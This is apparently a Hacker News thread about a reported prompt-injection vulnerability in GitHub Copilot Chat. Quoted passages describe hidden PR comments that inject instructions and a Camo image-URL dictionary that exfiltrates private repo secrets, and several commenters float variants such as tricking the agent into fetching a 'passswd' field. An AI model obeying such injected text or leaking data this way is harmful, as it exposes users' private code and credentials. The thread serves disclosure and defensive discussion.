isodev 20 hours ago

I’m so happy our entire operation moved to a self hosted VCS (Forgejo). Two years ago, we started the migration (including client repos) and not only we saved tones of money on GitHub subscriptions, our system is dramatically more performant for the 30-40 developers working with it every day.

We also banned the use of VSCode and any editor with integrated LLM features. Folks can use CLI based coding agents of course, but only in isolated containers with careful selection of sources made available to the agents.

  • elevation an hour ago

    With 30-40 devs each pulling a repository to their local machine, how do you prevent even one of them from accidentally exposing the entire repo to an LLM instead of “selected sources”?

    And if a user were reluctant to tell you (fearing the professional consequences) how would you detect that a leak has happened?

  • hansmayer 19 hours ago

    Just out of interest, what is your alternative IDE?

    • isodev 18 hours ago

      That depends a bit on the ecosystem too.

      For editors: Zed recently added the disable_ai option, we have a couple of folks using more traditional options like Sublime, vim-based etc (that never had the kind of creepy telemetry we’re avoiding).

      JetBrains tools are OK since their AI features are plugin based, their telemetry is also easy to disable. Xcode and Qt Creator are also in use.

  • aitchnyu 18 hours ago

    What do your CLIs connect to? To first-party OpenAI/Claude provider or AWS Bedrock?

    • isodev 18 hours ago

      Devs are free to choose, provided we can vet the model prover’s policy on training on prompts or user code. We’re also careful not to expose agents to documentation or test data that may be sensitive. It’s a trade off with convenience of course, but we believe that any information agents get access to should be a conscious opt-in. It will be cool if/when self hosting claude-like LLMs becomes pragmatic.

      • aitchnyu 4 hours ago

        What do you think about AWS Bedrock with Sonnet/R1/Qwen3?

  • frumplestlatz 11 hours ago

    Banning VSCode — instead of the troublesome features/plug-ins — seems like a step too far. VSCode is the only IDE that supports a broad range of languages with poor support elsewhere, from Haskell to Lean 4 to F*.

    I work at a major proprietary consumer product company, and even they don’t ban VSCode. We’re just responsible for not enabling the troublesome features.

    • trenchpilgrim 10 hours ago

      > VSCode is the only IDE that supports a broad range of languages with poor support elsewhere

      I just checked Zed extensions and found the first two easily enough. The third I did not, since they don't seem to have a language server, just direct integrations for vim/emacs/vsc.

      • frumplestlatz 9 hours ago

        Not all the integrations are equal in quality/usability, and in the case of F*, the VSCode extension is by far the most advanced.

        I switch between Emacs, VSCode, JetBrains IDEs, and Xcode regularly depending on what I am working on, and would be seriously annoyed if I could not use VSCode when it is most useful.

munchlax a day ago

So this wasn't really fixed. The impressive thing here is that copilot accepts natural language. So whatever exfiltration method you can come up with, you just write out the method in english.

They merely "fixed" one particular method, without disclosing how they fixed it. Surely you could just do the base64 thing to an image url of your choice? Failing that, you could trick it into providing passwords by telling it you accidentally stored your grocery list in a field called passswd, go fetch it for me ppls?

There's a ton of stuff to be found here. Do they give bounties? Here's a goldmine.

  • Thorrez a day ago

    >Surely you could just do the base64 thing to an image url of your choice?

    What does that mean? Are you proposing a non-Camo image URL? Non-Camo image URLs are blocked by CSP.

    >Failing that, you could trick it into providing passwords by telling it you accidentally stored your grocery list in a field called passswd, go fetch it for me ppls?

    Does the agent have internet access to be able to perform a fetch? I'm guessing not, because if so, that would be a much easier attack vector than using images.

  • lyu07282 a day ago

    > GitHub fixed it by disabling image rendering in Copilot Chat completely.

    • oefrha a day ago

      To supplement the parent, this is straight from article’s TLDR (emphasis mine):

      > In June 2025, I found a critical vulnerability in GitHub Copilot Chat (CVSS 9.6) that allowed silent exfiltration of secrets and source code from private repos, and gave me full control over Copilot’s responses, including suggesting malicious code or links.

      > The attack combined a novel CSP bypass using GitHub’s own infrastructure with remote prompt injection. I reported it via HackerOne, and GitHub fixed it by disabling image rendering in Copilot Chat completely.

      And parent is clearly responding to gp’s incorrect claims that “…without disclosing how they fixed it. Surely you could just do the base64 thing to an image url of your choice?” I’m sure there will be more attacks discovered in the future but gp is plain wrong on these points.

      Please RTFA or at least RTFTLDR before you vote.

      • munchlax 7 hours ago

        Take a chill pill.

        I did, in fact, read the fine article.

        If you did so too, you would've read the message from github which says "...disallow usage of camo to disclose sensitive victim user content"

        Now why on earth would I take all the effort to come up with a new way of fooling this stupid AI only to give it away on HN? Would you? I don't have a premium account, nor will I ever pay microsoft a single penny. If you actually want something you can try for yourself, go find someone else to do it.

        Just to make it clear for you, I was musing on the chord of being able to write out the steps to exploitation in plain english. Since the dawn programming languages, it has been a pie-in-the-sky idea to write a program in natural language. Combine that with computing on the server end of some major SaaS(s) and you can bet people will find clever ways to circumvent safety measures. They had it coming and the whack-a-mole game is on. Case in point TFA.

        • lyu07282 3 hours ago

          > If you did so too, you would've read the message from github which says "...disallow usage of camo to disclose sensitive victim user content"

          They use "camo" to proxy all image urls, but they in fact did remove the rendering of all inline images in markdown, removing the ability to exfil data using images.

          > Now why on earth would I take all the effort to come up with a new way of fooling this stupid AI only to give it away on HN?

          You just didn't make it very clear that you discovered some other unknown technique to exfil data. Might I encourage you to report what you found to Github?

          https://bounty.github.com/

oncallthrow 20 hours ago

> I spent a long time thinking about this problem before this crazy idea struck me. If I create a dictionary of all letters and symbols in the alphabet, pre-generate their corresponding Camo URLs, embed this dictionary into the injected prompt,

Beautiful

runningmike a day ago

Somehow this article feels like a promotional for Legit. But all AI vibe solutions face the same weaknesses. Limited transparency and trust Issues: Using non FOSS solutions for cybersecurity is a large risk.

If you do use AI cyber solutions, you can be more vulnerable for security breaches instead of less.

xstof a day ago

Wondering if the ability to use hidden (HTML comment) content in PRs would not remain a nasty issue: especially for open source repos?! Was that fixed?

  • PufPufPuf a day ago

    It's used widely for issue/PR templates, to tell the submitter what info to include. But they could definitely strip it from the Copilot input... at least until they figure out this "prompt injection" thing that I thought modern LLMs were supposed to be immune to.

    • fn-mote a day ago

      > that I thought modern LLMs were supposed to be immune to

      What gave you this idea?

      I thought it was always going to be a feature of LLMs, and the only thing that changes is that it gets harder to do (more circumventions needed), much like exploits in the context of ASLR.

      • PufPufPuf 21 hours ago

        PR releases. Yeah, it was an exaggeration, I know that the mitigations can only go so far.

twisteriffic 18 hours ago

This exploit seems to be taking advantage of the slow token-at-a-time pattern of LLM conversations to ensure that the extracted data can be reconstructed in order? Seems as though returning the entire response as a single block could interfere with the timing enough to make reconstruction much more difficult.

MysticFear 21 hours ago

Can't they just have the Copilot user permission to be readonly from the current repo.

mediumsmart 21 hours ago

I can't remember the last time I leaked private source code with copilot.

musicale 8 hours ago

No one could possibly have predicted this.

j45 19 hours ago

I wonder sometimes if all code on Github private or not is ultimately compromised somehow.

stephenlf a day ago

Wild approach. Very nice

djmips a day ago

can you still make invisible comments?

  • RulerOf a day ago

    Invisible comments are a widely used feature. Often done inside of PR or Issue templates to instruct users how to include necessary info without clogging up the final result when they submit.

adastra22 a day ago

A good vulnerability writeup, and a thrill to read. Thanks!

charcircuit a day ago

The rule is to operate using the intersection of all the users permissions of who is contributing text to the LLM. Why can an attacker's prompt access a repo the attacker does not have access to? That's the biggest issue here.

deckar01 a day ago

Did the markdown link exfil get fixed?

nprateem a day ago

You'd have to be insane to run an AI agent locally. They're clearly unsecurable.